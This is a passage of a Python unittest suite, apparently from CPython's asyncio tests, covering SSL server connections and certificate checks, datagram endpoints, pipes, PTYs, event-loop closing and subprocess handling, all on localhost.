def _make_ssl_server(self, factory, certfile, keyfile=None):
sslcontext = self._create_ssl_context(certfile, keyfile)
f = self.loop.create_server(factory, '127.0.0.1', 0, ssl=sslcontext)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
self.assertEqual(host, '127.0.0.1')
return server, host, port
def _make_ssl_unix_server(self, factory, certfile, keyfile=None):
sslcontext = self._create_ssl_context(certfile, keyfile)
return self._make_unix_server(factory, ssl=sslcontext)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, test_utils.ONLYCERT, test_utils.ONLYKEY)
f_c = self.loop.create_connection(MyBaseProto, host, port,
ssl=test_utils.dummy_ssl_context())
client, pr = self.loop.run_until_complete(f_c)
client.write(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# extra info is available
self.check_ssl_extra_info(client, peername=(host, port))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
        # the client socket must be closed afterwards to avoid ECONNRESET upon
        # recv()/send() on the serving socket
client.close()
# stop serving
server.close()
@support.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_unix_server_ssl(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, test_utils.ONLYCERT, test_utils.ONLYKEY)
f_c = self.loop.create_unix_connection(
MyBaseProto, path, ssl=test_utils.dummy_ssl_context(),
server_hostname='')
client, pr = self.loop.run_until_complete(f_c)
client.write(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
        # the client socket must be closed afterwards to avoid ECONNRESET upon
        # recv()/send() on the serving socket
client.close()
# stop serving
server.close()
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_verify_failed(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# no CA loaded
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client)
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(ssl.SSLError,
'(?i)certificate.verify.failed'):
self.loop.run_until_complete(f_c)
# execute the loop to log the connection error
test_utils.run_briefly(self.loop)
# close connection
self.assertIsNone(proto.transport)
server.close()
@support.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_unix_server_ssl_verify_failed(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# no CA loaded
f_c = self.loop.create_unix_connection(MyProto, path,
ssl=sslcontext_client,
server_hostname='invalid')
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(ssl.SSLError,
'(?i)certificate.verify.failed'):
self.loop.run_until_complete(f_c)
# execute the loop to log the connection error
test_utils.run_briefly(self.loop)
# close connection
self.assertIsNone(proto.transport)
server.close()
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_match_failed(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(
cafile=test_utils.SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# incorrect server_hostname
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client)
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(
ssl.CertificateError,
"IP address mismatch, certificate is not valid for "
"'127.0.0.1'"):
self.loop.run_until_complete(f_c)
# close connection
# transport is None because TLS ALERT aborted the handshake
self.assertIsNone(proto.transport)
server.close()
@support.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_unix_server_ssl_verified(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(cafile=test_utils.SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# Connection succeeds with correct CA and server hostname.
f_c = self.loop.create_unix_connection(MyProto, path,
ssl=sslcontext_client,
server_hostname='localhost')
client, pr = self.loop.run_until_complete(f_c)
# close connection
proto.transport.close()
client.close()
server.close()
self.loop.run_until_complete(proto.done)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_verified(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(cafile=test_utils.SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# Connection succeeds with correct CA and server hostname.
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client,
server_hostname='localhost')
client, pr = self.loop.run_until_complete(f_c)
# extra info is available
        self.check_ssl_extra_info(client, peername=(host, port),
peercert=test_utils.PEERCERT)
# close connection
proto.transport.close()
client.close()
server.close()
self.loop.run_until_complete(proto.done)
def test_create_server_sock(self):
proto = asyncio.Future(loop=self.loop)
class TestMyProto(MyProto):
def connection_made(self, transport):
super().connection_made(transport)
proto.set_result(self)
sock_ob = socket.create_server(('0.0.0.0', 0))
f = self.loop.create_server(TestMyProto, sock=sock_ob)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
self.assertEqual(sock.fileno(), sock_ob.fileno())
host, port = sock.getsockname()
self.assertEqual(host, '0.0.0.0')
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
client.close()
server.close()
def test_create_server_addr_in_use(self):
sock_ob = socket.create_server(('0.0.0.0', 0))
f = self.loop.create_server(MyProto, sock=sock_ob)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
f = self.loop.create_server(MyProto, host=host, port=port)
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(f)
self.assertEqual(cm.exception.errno, errno.EADDRINUSE)
server.close()
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 not supported or enabled')
def test_create_server_dual_stack(self):
f_proto = asyncio.Future(loop=self.loop)
class TestMyProto(MyProto):
def connection_made(self, transport):
super().connection_made(transport)
f_proto.set_result(self)
try_count = 0
while True:
try:
port = support.find_unused_port()
f = self.loop.create_server(TestMyProto, host=None, port=port)
server = self.loop.run_until_complete(f)
except OSError as ex:
if ex.errno == errno.EADDRINUSE:
try_count += 1
self.assertGreaterEqual(5, try_count)
continue
else:
raise
else:
break
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
proto = self.loop.run_until_complete(f_proto)
proto.transport.close()
client.close()
f_proto = asyncio.Future(loop=self.loop)
client = socket.socket(socket.AF_INET6)
client.connect(('::1', port))
client.send(b'xxx')
proto = self.loop.run_until_complete(f_proto)
proto.transport.close()
client.close()
server.close()
def test_server_close(self):
f = self.loop.create_server(MyProto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
client.close()
server.close()
client = socket.socket()
self.assertRaises(
ConnectionRefusedError, client.connect, ('127.0.0.1', port))
client.close()
def test_create_datagram_endpoint(self):
class TestMyDatagramProto(MyDatagramProto):
def __init__(inner_self):
super().__init__(loop=self.loop)
def datagram_received(self, data, addr):
super().datagram_received(data, addr)
self.transport.sendto(b'resp:'+data, addr)
coro = self.loop.create_datagram_endpoint(
TestMyDatagramProto, local_addr=('127.0.0.1', 0))
s_transport, server = self.loop.run_until_complete(coro)
host, port = s_transport.get_extra_info('sockname')
self.assertIsInstance(s_transport, asyncio.Transport)
self.assertIsInstance(server, TestMyDatagramProto)
self.assertEqual('INITIALIZED', server.state)
self.assertIs(server.transport, s_transport)
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop),
remote_addr=(host, port))
transport, client = self.loop.run_until_complete(coro)
self.assertIsInstance(transport, asyncio.Transport)
self.assertIsInstance(client, MyDatagramProto)
self.assertEqual('INITIALIZED', client.state)
self.assertIs(client.transport, transport)
transport.sendto(b'xxx')
test_utils.run_until(self.loop, lambda: server.nbytes)
self.assertEqual(3, server.nbytes)
test_utils.run_until(self.loop, lambda: client.nbytes)
# received
self.assertEqual(8, client.nbytes)
# extra info is available
self.assertIsNotNone(transport.get_extra_info('sockname'))
# close connection
transport.close()
self.loop.run_until_complete(client.done)
self.assertEqual('CLOSED', client.state)
server.transport.close()
def test_create_datagram_endpoint_sock(self):
sock = None
local_address = ('127.0.0.1', 0)
infos = self.loop.run_until_complete(
self.loop.getaddrinfo(
*local_address, type=socket.SOCK_DGRAM))
for family, type, proto, cname, address in infos:
try:
sock = socket.socket(family=family, type=type, proto=proto)
sock.setblocking(False)
sock.bind(address)
except:
pass
else:
break
else:
assert False, 'Can not create socket.'
f = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop), sock=sock)
tr, pr = self.loop.run_until_complete(f)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, MyDatagramProto)
tr.close()
self.loop.run_until_complete(pr.done)
def test_internal_fds(self):
loop = self.create_event_loop()
if not isinstance(loop, selector_events.BaseSelectorEventLoop):
loop.close()
self.skipTest('loop is not a BaseSelectorEventLoop')
self.assertEqual(1, loop._internal_fds)
loop.close()
self.assertEqual(0, loop._internal_fds)
self.assertIsNone(loop._csock)
self.assertIsNone(loop._ssock)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_read_pipe(self):
proto = MyReadPipeProto(loop=self.loop)
rpipe, wpipe = os.pipe()
pipeobj = io.open(rpipe, 'rb', 1024)
async def connect():
t, p = await self.loop.connect_read_pipe(
lambda: proto, pipeobj)
self.assertIs(p, proto)
self.assertIs(t, proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(0, proto.nbytes)
self.loop.run_until_complete(connect())
os.write(wpipe, b'1')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 1)
self.assertEqual(1, proto.nbytes)
os.write(wpipe, b'2345')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 5)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(5, proto.nbytes)
os.close(wpipe)
self.loop.run_until_complete(proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], proto.state)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_unclosed_pipe_transport(self):
# This test reproduces the issue #314 on GitHub
loop = self.create_event_loop()
read_proto = MyReadPipeProto(loop=loop)
write_proto = MyWritePipeProto(loop=loop)
rpipe, wpipe = os.pipe()
rpipeobj = io.open(rpipe, 'rb', 1024)
wpipeobj = io.open(wpipe, 'w', 1024)
async def connect():
read_transport, _ = await loop.connect_read_pipe(
lambda: read_proto, rpipeobj)
write_transport, _ = await loop.connect_write_pipe(
lambda: write_proto, wpipeobj)
return read_transport, write_transport
# Run and close the loop without closing the transports
read_transport, write_transport = loop.run_until_complete(connect())
loop.close()
# These 'repr' calls used to raise an AttributeError
# See Issue #314 on GitHub
self.assertIn('open', repr(read_transport))
self.assertIn('open', repr(write_transport))
# Clean up (avoid ResourceWarning)
rpipeobj.close()
wpipeobj.close()
read_transport._pipe = None
write_transport._pipe = None
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_read_pty_output(self):
proto = MyReadPipeProto(loop=self.loop)
master, slave = os.openpty()
master_read_obj = io.open(master, 'rb', 0)
async def connect():
t, p = await self.loop.connect_read_pipe(lambda: proto,
master_read_obj)
self.assertIs(p, proto)
self.assertIs(t, proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(0, proto.nbytes)
self.loop.run_until_complete(connect())
os.write(slave, b'1')
test_utils.run_until(self.loop, lambda: proto.nbytes)
self.assertEqual(1, proto.nbytes)
os.write(slave, b'2345')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 5)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(5, proto.nbytes)
os.close(slave)
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], proto.state)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_write_pipe(self):
rpipe, wpipe = os.pipe()
pipeobj = io.open(wpipe, 'wb', 1024)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, pipeobj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = bytearray()
def reader(data):
chunk = os.read(rpipe, 1024)
data += chunk
return len(data)
test_utils.run_until(self.loop, lambda: reader(data) >= 1)
self.assertEqual(b'1', data)
transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5)
self.assertEqual(b'12345', data)
self.assertEqual('CONNECTED', proto.state)
os.close(rpipe)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_write_pipe_disconnect_on_close(self):
rsock, wsock = socket.socketpair()
rsock.setblocking(False)
pipeobj = io.open(wsock.detach(), 'wb', 1024)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, pipeobj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = self.loop.run_until_complete(self.loop.sock_recv(rsock, 1024))
self.assertEqual(b'1', data)
rsock.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
# select, poll and kqueue don't support character devices (PTY) on Mac OS X
# older than 10.6 (Snow Leopard)
@support.requires_mac_ver(10, 6)
def test_write_pty(self):
master, slave = os.openpty()
slave_write_obj = io.open(slave, 'wb', 0)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, slave_write_obj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = bytearray()
def reader(data):
chunk = os.read(master, 1024)
data += chunk
return len(data)
test_utils.run_until(self.loop, lambda: reader(data) >= 1,
timeout=10)
self.assertEqual(b'1', data)
transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5,
timeout=10)
self.assertEqual(b'12345', data)
self.assertEqual('CONNECTED', proto.state)
os.close(master)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
# select, poll and kqueue don't support character devices (PTY) on Mac OS X
# older than 10.6 (Snow Leopard)
@support.requires_mac_ver(10, 6)
def test_bidirectional_pty(self):
master, read_slave = os.openpty()
write_slave = os.dup(read_slave)
tty.setraw(read_slave)
slave_read_obj = io.open(read_slave, 'rb', 0)
read_proto = MyReadPipeProto(loop=self.loop)
read_connect = self.loop.connect_read_pipe(lambda: read_proto,
slave_read_obj)
read_transport, p = self.loop.run_until_complete(read_connect)
self.assertIs(p, read_proto)
self.assertIs(read_transport, read_proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(0, read_proto.nbytes)
slave_write_obj = io.open(write_slave, 'wb', 0)
write_proto = MyWritePipeProto(loop=self.loop)
write_connect = self.loop.connect_write_pipe(lambda: write_proto,
slave_write_obj)
write_transport, p = self.loop.run_until_complete(write_connect)
self.assertIs(p, write_proto)
self.assertIs(write_transport, write_proto.transport)
self.assertEqual('CONNECTED', write_proto.state)
data = bytearray()
def reader(data):
chunk = os.read(master, 1024)
data += chunk
return len(data)
write_transport.write(b'1')
test_utils.run_until(self.loop, lambda: reader(data) >= 1, timeout=10)
self.assertEqual(b'1', data)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual('CONNECTED', write_proto.state)
os.write(master, b'a')
test_utils.run_until(self.loop, lambda: read_proto.nbytes >= 1,
timeout=10)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(1, read_proto.nbytes)
self.assertEqual('CONNECTED', write_proto.state)
write_transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5, timeout=10)
self.assertEqual(b'12345', data)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual('CONNECTED', write_proto.state)
os.write(master, b'bcde')
test_utils.run_until(self.loop, lambda: read_proto.nbytes >= 5,
timeout=10)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(5, read_proto.nbytes)
self.assertEqual('CONNECTED', write_proto.state)
os.close(master)
read_transport.close()
self.loop.run_until_complete(read_proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], read_proto.state)
write_transport.close()
self.loop.run_until_complete(write_proto.done)
self.assertEqual('CLOSED', write_proto.state)
def test_prompt_cancellation(self):
r, w = socket.socketpair()
r.setblocking(False)
f = self.loop.create_task(self.loop.sock_recv(r, 1))
ov = getattr(f, 'ov', None)
if ov is not None:
self.assertTrue(ov.pending)
async def main():
try:
self.loop.call_soon(f.cancel)
await f
except asyncio.CancelledError:
res = 'cancelled'
else:
res = None
finally:
self.loop.stop()
return res
start = time.monotonic()
t = asyncio.Task(main(), loop=self.loop)
self.loop.run_forever()
elapsed = time.monotonic() - start
self.assertLess(elapsed, 0.1)
self.assertEqual(t.result(), 'cancelled')
self.assertRaises(asyncio.CancelledError, f.result)
if ov is not None:
self.assertFalse(ov.pending)
self.loop._stop_serving(r)
r.close()
w.close()
def test_timeout_rounding(self):
def _run_once():
self.loop._run_once_counter += 1
orig_run_once()
orig_run_once = self.loop._run_once
self.loop._run_once_counter = 0
self.loop._run_once = _run_once
async def wait():
loop = self.loop
await asyncio.sleep(1e-2)
await asyncio.sleep(1e-4)
await asyncio.sleep(1e-6)
await asyncio.sleep(1e-8)
await asyncio.sleep(1e-10)
self.loop.run_until_complete(wait())
        # The ideal number of calls is 12, but on some platforms, the selector
        # may sleep a little bit less than the timeout depending on the resolution
# of the clock used by the kernel. Tolerate a few useless calls on
# these platforms.
self.assertLessEqual(self.loop._run_once_counter, 20,
{'clock_resolution': self.loop._clock_resolution,
'selector': self.loop._selector.__class__.__name__})
def test_remove_fds_after_closing(self):
loop = self.create_event_loop()
callback = lambda: None
r, w = socket.socketpair()
self.addCleanup(r.close)
self.addCleanup(w.close)
loop.add_reader(r, callback)
loop.add_writer(w, callback)
loop.close()
self.assertFalse(loop.remove_reader(r))
self.assertFalse(loop.remove_writer(w))
def test_add_fds_after_closing(self):
loop = self.create_event_loop()
callback = lambda: None
r, w = socket.socketpair()
self.addCleanup(r.close)
self.addCleanup(w.close)
loop.close()
with self.assertRaises(RuntimeError):
loop.add_reader(r, callback)
with self.assertRaises(RuntimeError):
loop.add_writer(w, callback)
def test_close_running_event_loop(self):
async def close_loop(loop):
self.loop.close()
coro = close_loop(self.loop)
with self.assertRaises(RuntimeError):
self.loop.run_until_complete(coro)
def test_close(self):
self.loop.close()
async def test():
pass
func = lambda: False
coro = test()
self.addCleanup(coro.close)
# operation blocked when the loop is closed
with self.assertRaises(RuntimeError):
self.loop.run_forever()
with self.assertRaises(RuntimeError):
fut = asyncio.Future(loop=self.loop)
self.loop.run_until_complete(fut)
with self.assertRaises(RuntimeError):
self.loop.call_soon(func)
with self.assertRaises(RuntimeError):
self.loop.call_soon_threadsafe(func)
with self.assertRaises(RuntimeError):
self.loop.call_later(1.0, func)
with self.assertRaises(RuntimeError):
self.loop.call_at(self.loop.time() + .0, func)
with self.assertRaises(RuntimeError):
self.loop.create_task(coro)
with self.assertRaises(RuntimeError):
self.loop.add_signal_handler(signal.SIGTERM, func)
# run_in_executor test is tricky: the method is a coroutine,
# but run_until_complete cannot be called on closed loop.
# Thus iterate once explicitly.
with self.assertRaises(RuntimeError):
it = self.loop.run_in_executor(None, func).__await__()
next(it)
class SubprocessTestsMixin:
def check_terminated(self, returncode):
if sys.platform == 'win32':
self.assertIsInstance(returncode, int)
# expect 1 but sometimes get 0
else:
self.assertEqual(-signal.SIGTERM, returncode)
def check_killed(self, returncode):
if sys.platform == 'win32':
self.assertIsInstance(returncode, int)
# expect 1 but sometimes get 0
else:
self.assertEqual(-signal.SIGKILL, returncode)
def test_subprocess_exec(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
stdin = transp.get_pipe_transport(0)
stdin.write(b'Python The Winner')
self.loop.run_until_complete(proto.got_data[1].wait())
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
self.assertEqual(b'Python The Winner', proto.data[1])
def test_subprocess_interactive(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
stdin = transp.get_pipe_transport(0)
stdin.write(b'Python ')
self.loop.run_until_complete(proto.got_data[1].wait())
proto.got_data[1].clear()
self.assertEqual(b'Python ', proto.data[1])
stdin.write(b'The Winner')
self.loop.run_until_complete(proto.got_data[1].wait())
self.assertEqual(b'Python The Winner', proto.data[1])
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
def test_subprocess_shell(self):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'echo Python')
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.get_pipe_transport(0).close()
self.loop.run_until_complete(proto.completed)
self.assertEqual(0, proto.returncode)
self.assertTrue(all(f.done() for f in proto.disconnects.values()))
self.assertEqual(proto.data[1].rstrip(b'\r\n'), b'Python')
self.assertEqual(proto.data[2], b'')
transp.close()
def test_subprocess_exitcode(self):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
transp.close()
def test_subprocess_close_after_finish(self):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.assertIsNone(transp.get_pipe_transport(0))
self.assertIsNone(transp.get_pipe_transport(1))
self.assertIsNone(transp.get_pipe_transport(2))
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
self.assertIsNone(transp.close())
def test_subprocess_kill(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.kill()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
transp.close()
def test_subprocess_terminate(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.terminate()
self.loop.run_until_complete(proto.completed)
self.check_terminated(proto.returncode)
transp.close()
@unittest.skipIf(sys.platform == 'win32', "Don't have SIGHUP")
def test_subprocess_send_signal(self):
# bpo-31034: Make sure that we get the default signal handler (killing
# the process). The parent process may have decided to ignore SIGHUP,
# and signal handlers are inherited.
old_handler = signal.signal(signal.SIGHUP, signal.SIG_DFL)
try:
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.send_signal(signal.SIGHUP)
self.loop.run_until_complete(proto.completed)
self.assertEqual(-signal.SIGHUP, proto.returncode)
transp.close()
finally:
signal.signal(signal.SIGHUP, old_handler)
def test_subprocess_stderr(self):
prog = os.path.join(os.path.dirname(__file__), 'echo2.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
stdin.write(b'test')
self.loop.run_until_complete(proto.completed)
transp.close()
self.assertEqual(b'OUT:test', proto.data[1])
self.assertTrue(proto.data[2].startswith(b'ERR:test'), proto.data[2])
self.assertEqual(0, proto.returncode)
def test_subprocess_stderr_redirect_to_stdout(self):
prog = os.path.join(os.path.dirname(__file__), 'echo2.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog, stderr=subprocess.STDOUT)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
self.assertIsNotNone(transp.get_pipe_transport(1))
self.assertIsNone(transp.get_pipe_transport(2))
stdin.write(b'test')
self.loop.run_until_complete(proto.completed)
self.assertTrue(proto.data[1].startswith(b'OUT:testERR:test'),
proto.data[1])
self.assertEqual(b'', proto.data[2])
transp.close()
self.assertEqual(0, proto.returncode)
def test_subprocess_close_client_stream(self):
prog = os.path.join(os.path.dirname(__file__), 'echo3.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
stdout = transp.get_pipe_transport(1)
stdin.write(b'test')
self.loop.run_until_complete(proto.got_data[1].wait())
self.assertEqual(b'OUT:test', proto.data[1])
stdout.close()
self.loop.run_until_complete(proto.disconnects[1])
stdin.write(b'xxx')
self.loop.run_until_complete(proto.got_data[2].wait())
if sys.platform != 'win32':
self.assertEqual(b'ERR:BrokenPipeError', proto.data[2])
else:
# After closing the read-end of a pipe, writing to the
# write-end using os.write() fails with errno==EINVAL and
# GetLastError()==ERROR_INVALID_NAME on Windows!?! (Using
# WriteFile() we get ERROR_BROKEN_PIPE as expected.)
self.assertEqual(b'ERR:OSError', proto.data[2])
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
def test_subprocess_wait_no_same_group(self):
# start the new process in a new session
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None,
start_new_session=True)
        _, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
